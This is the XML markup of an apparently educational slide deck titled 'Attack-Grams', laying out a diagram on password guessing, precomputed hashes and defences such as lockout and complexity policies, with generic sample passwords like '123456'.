          <p:cNvPr id="157" name="Table 31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6518160" y="3667680"/>
          <a:ext cx="2744280" cy="1281600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="933120"/>
                <a:gridCol w="669600"/>
                <a:gridCol w="114192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value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md5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sha256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BB74…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58" name="TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6662520" y="3298320"/>
            <a:ext cx="2454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Precomputed hashes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807920" y="3463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Password Guessing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958280" y="1690560"/>
            <a:ext cx="717840" cy="872280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4852800" y="2563560"/>
            <a:ext cx="806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Graphic 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2210400" y="1650960"/>
            <a:ext cx="951840" cy="9518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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140200" y="2575080"/>
            <a:ext cx="107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4" name="Table 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="707760" y="1690560"/>
          <a:ext cx="1302120" cy="1373400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="130248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123456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65" name="TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678960" y="3133440"/>
            <a:ext cx="1325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Common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6" name="Straight Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2565720" y="2896200"/>
            <a:ext cx="9720" cy="361152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167" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213880" y="2898720"/>
            <a:ext cx="720" cy="355284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pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Picture 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="41000"/>
          </a:blip>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="181200">
            <a:off x="5909400" y="1653120"/>
            <a:ext cx="2015280" cy="2205000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6026760" y="3855600"/>
            <a:ext cx="1898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 Policy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Box 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553800" y="1787400"/>
            <a:ext cx="8442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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Lockout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Box 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6507000" y="2095920"/>
            <a:ext cx="11167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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Complexity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2" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2574720" y="3278160"/>
            <a:ext cx="2631240" cy="72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73" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3642840" y="2948760"/>
            <a:ext cx="1549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123456'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4" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566440" y="3292560"/>
            <a:ext cx="2648160" cy="85428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175" name="TextBox 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570400">
            <a:off x="2384280" y="3562200"/>
            <a:ext cx="2060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6" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567160" y="4171320"/>
            <a:ext cx="2647440" cy="72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77" name="TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3508200" y="3843000"/>
            <a:ext cx="176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8" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2565720" y="4202280"/>
            <a:ext cx="2640240" cy="86868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179" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563200">
            <a:off x="2383920" y="4464360"/>
            <a:ext cx="2060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Box 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3783960" y="4650120"/>
            <a:ext cx="362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1" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2583360" y="5495760"/>
            <a:ext cx="2631240" cy="72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82" name="TextBox 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493440" y="5195160"/>
            <a:ext cx="1724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ABCDEFG'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3" name="Straight Arrow Connector 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2565720" y="5541480"/>
            <a:ext cx="2640240" cy="768600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="70ad47"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="TextBox 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638200">
            <a:off x="2394000" y="5740560"/>
            <a:ext cx="206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20661</TotalTime>
  <Application>LibreOffice/7.6.2.1$Linux_X86_64 LibreOffice_project/60$Build-1</Application>
  <AppVersion>15.0000</AppVersion>
  <Words>503</Words>
  <Paragraphs>206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2019-01-08T18:07:44Z</dcterms:created>
  <dc:creator>Paul Ionescu</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-08T16:37:11Z</dcterms:modified>
  <cp:revision>83</cp:revision>
  <dc:subject/>
  <dc:title>Attack-Grams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22</vt:i4>
  </property>
</Properties>
</file>